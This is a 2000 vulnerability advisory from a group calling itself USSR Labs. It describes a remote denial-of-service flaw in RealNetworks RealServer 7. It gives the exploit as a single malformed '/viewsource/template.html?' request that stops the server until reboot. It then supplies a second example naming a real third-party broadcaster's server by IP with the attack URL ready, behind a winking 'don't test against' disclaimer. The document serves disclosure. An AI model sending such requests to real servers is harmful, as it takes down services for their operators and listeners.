Remote DoS attack in Real Networks Real Server (Strike #2) Vulnerability

   

 

Real Networks Real Server

 



USSR Advisory Code:   USSR-2000043

Release Date:
June 1, 2000

Systems Affected:
Real Networks Real Server 7 Linuxc6 
Real Networks Real Server 7 Solaris 2.6 
Real Networks Real Server 7 Solaris 2.7 
Real Networks Real Server 7 Solaris 2.8 
Real Networks Real Server 7 Windows NT/2000 
Real Networks Real Server 7 SGI Irix 6.2 
Real Networks Real Server 7 SGI Irix 6.5 
Real Networks Real Server 7 SCO Unixware 7.xx 
Real Networks Real Server 7 FreeBSD 3.0 
Real Networks Real Server 7.01 Linuxc6 
Real Networks Real Server 7.01 Solaris 2.6 
Real Networks Real Server 7.01 Solaris 2.7 
Real Networks Real Server 7.01 Solaris 2.8 
Real Networks Real Server 7.01 Windows NT/2000 
Real Networks Real Server 7.01 SGI Irix 6.2 
Real Networks Real Server 7.01 SGI Irix 6.5 
Real Networks Real Server 7.01 SCO Unixware 7.xx 
Real Networks Real Server 7.01 FreeBSD 3.0 
Real Networks Real Server G2 1.0


THE PROBLEM

The Ussr Labs team has recently discovered a memory problem in the RealServer 7 Server (patched and non-patched).

What happens is, by performing an attack sending specially-malformed information to the RealServer HTTP Port(default is 8080),
the process containing the services will stop responding.

The Exploit:
It will take down the RealServer causing it to stop all streaming media brodcasts, making it non-functional, 
(untill Reboot)

Example:
With the RealServer server running on 'Port' (default being 8080) the syntax to do the D.O.S. attack is:

http://ServerIp:Port/viewsource/template.html?

And Real Server will Stop Responding.

SPECIAL NOTE: 
That we take no responsibility for this Example it is for educational purposes only, Dont test 
against British Broadcasting Corporation 1999 Radio 

Exaple 2: 
Radio: British Broadcasting Corporation 1999 (default in RealPlayer 8)

Radio Url: 
http://playlist.broadcast.com/makeplaylist.asp?id=7708&encad=2F6164732F617564696F686967687761792F617564696F68696768776179325F3238

RealServer http running on port 80
RealServer http ip: 206.190.42.7

Valid Url for Clip Source: 
http://206.190.42.7/viewsource/template.html?nuyhtgs0pdz6iqm557a6i9bgj054ngdnbfzgro7zxfAjq357lnwEC6ne8s5ge5hi4ejqC1t6x1amn
gaAmkyf59v6zgjqC1t6x1amngoAmkyf1AvuEfhe640hBh60EeADAo2097qglh

Malformed Url for Clip Source: 
http://206.190.42.7/viewsource/template.html?

Vendor Status:  
Yes! Informed! I sent them more than 4 emails and each time I received JUNK mails in reply,
My Incident ID number for this request is 19163930.


Vendor   Url: http://www.real.com
Program  Url: http://www.realnetworks.com/products/basicserverplus/index.html?src=home
Download Url: http://proforma.real.com/rn/servers/eval/index.html?src=home,srvpl_020400,srvntra

Related Links:

Underground Security Systems Research
http://www.ussrback.com

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN, Sub, prizm, b0f,Technotronic and Rfp.

Copyright (c) 1999-2000 Underground Security Systems Research.
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express 
consent of Ussr. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please 
e-mail labs@ussrback.com for permission.

Disclaimer:
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS 
condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages 
whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at 
the user's own risk.

Feedback:
Please send suggestions, updates, and comments to:

Underground Security Systems Research
mail:labs@ussrback.com
http://www.ussrback.com